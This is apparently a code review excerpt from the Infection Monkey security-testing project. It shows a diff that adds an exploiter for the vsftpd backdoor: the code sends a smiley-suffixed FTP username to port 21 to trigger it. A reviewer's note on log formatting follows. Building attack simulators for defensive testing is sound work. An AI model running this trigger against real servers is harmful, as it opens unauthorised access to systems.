monkey/infection_monkey/exploit/vsftpd.py

```diff
@@ -0,0 +1,120 @@
+import StringIO
+import logging
+import paramiko
+import socket
+import time
+from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import build_monkey_commandline
+from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
+from infection_monkey.model import MONKEY_ARG
+from infection_monkey.network.tools import check_tcp_port
+from logging import getLogger
+
+LOG = getLogger(__name__)
+
+__author__ = 'D3fa1t'
+
+FTP_PORT = 21
+TRANSFER_UPDATE_RATE = 15
+USERNAME = b'USER letmein:)\n'
+PASSWORD = b'PASS please\n'
+
+
+class VSFTPDExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['linux']
+    
+    def __init__(self, host):
+        self._update_timestamp = 0
+        super(VSFTPDExploiter, self).__init__(host)
+        self.skip_exist = self._config.skip_exploit_if_file_exist
+
+    def exploit_host(self):
+        try:
+            LOG.info('[*] Attempting to trigger backdoor...')
+            ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            ftp_socket.connect((self.host.ip_addr, FTP_PORT))
+            ftp_socket.recv(1024).decode('utf-8')
+            # Attempt to login to trigger backdoor
+            ftp_socket.send(USERNAME)
+            ftp_socket.recv(1024).decode('utf-8')
+            ftp_socket.send(PASSWORD)
+            time.sleep(1)
+            ftp_socket.close()
+            LOG.info('[+] Triggered backdoor')
+
+        except socket.error as e:
+            LOG.error('[!] Failed to trigger backdoor on %s' , self.host.ip_addr)
```

Comment:
You don't need to add [+] and [!]. The .error and .info format will do things for you in a consistent manner

Reply:
Ah, Alright will remove those. I added these since it would be easy to Identify this exploit during debugging.